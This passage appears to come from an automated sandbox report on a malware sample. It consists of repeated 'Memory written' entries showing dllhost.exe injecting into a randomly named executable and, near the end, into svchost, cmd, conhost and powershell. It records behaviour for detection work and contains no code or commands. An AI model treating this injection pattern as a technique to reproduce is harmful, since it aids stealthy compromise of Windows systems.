Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 14C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 14E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BE0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: C00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1250000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1270000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 12B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 12D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 6D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 6F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 900000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 920000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 3B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 3D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 9B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 9D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: AD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: AF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: CF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: D10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1450000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1470000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BE0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 380000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 15B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 15D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 9B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 9D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1420000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1440000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 380000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 13A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 13C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 590000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 5B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 700000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 720000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 920000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 940000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1210000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1230000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1440000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1450000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 3A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1250000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 280000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 10F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1170000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1220000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: CF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: D50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: C00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1040000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1440000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1030000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1450000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 790000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 3A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: B00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1250000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 860000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 280000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 810000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 10F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1370000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: B20000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1300000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1170000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 380000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 13C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1220000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1100000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: CF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 810000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 14A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: D50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1230000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: C00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: AC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1100000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1040000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 790000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1130000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1370000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1020000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: B20000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 280000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1300000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 380000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FED7750000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 178DCD40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 224138D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1100000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 810000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 2BCD7E00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2125F030000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1230000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C2C2310000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 26504E70000
